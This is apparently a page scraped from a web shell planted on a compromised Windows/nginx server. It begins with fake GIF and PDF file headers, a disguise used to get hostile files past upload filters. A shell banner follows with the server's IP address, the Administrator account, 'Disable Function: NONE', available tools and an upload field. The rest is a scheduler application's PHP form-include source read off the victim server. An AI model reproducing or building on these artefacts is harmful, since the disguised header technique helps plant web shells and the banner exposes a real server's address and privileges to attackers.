GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/Scheduler/admin/_info/form/ |
Upload File : |
<? // admin/_info/form/infoForm_Form_Selection.phpinc // Display the form selection form. t_Begin(); // Begin TRACKing included file. // Set radio button to default if unset. if ( !isset($f['formType']) ) $f['formType'] = 'form'; if ( !isset($f['form_selection_settings_value']) ) $f['form_selection_settings_value'] = 1; // Set to show if unset. ?> <a name="form_selection_settings_name"></a> <input type="hidden" name="form_selection_settings_value" id="form_selection_settings_value_id" value="<?=$f['form_selection_settings_value']?>"> <table><tr><td><fieldset><legend><a href="#form_selection_settings_name" name="form_selection_settings" onClick="return info_Set(this);"><div id="form_selection_settings_status" class="inline"><? if ( !$f['form_selection_settings_value']) { ?>+<? } else { ?>-<? } ?></div> form selection</a><input type="submit" name="subtask" value="Reload page" onClick="info_gotoName(this,'form_selection_settings_name');"></legend> <div id="form_selection_settings_show" class="<? if ( !$f['form_selection_settings_value']) { ?>d_s_h <? } ?>d_s_l"> <table> <tr> <td colspan="2">Form type: <label id="formTypEdit"><input type="radio" name="formType" id="formTypEdit" value="form"<? if ( $f['formType'] == 'form' ) { ?> checked<? } ?>><span>Add/Edit form</span></label> <label id="formTypeList"><input type="radio" name="formType" id="formTypeList" value="list"<? if ( $f['formType'] == 'list' ) { ?> checked<? } ?>><span>List form and control code</span></label> </td> </tr> </table> </div> </fieldset></td></tr></table> <? t_End(); // End TRACKing included file. ?>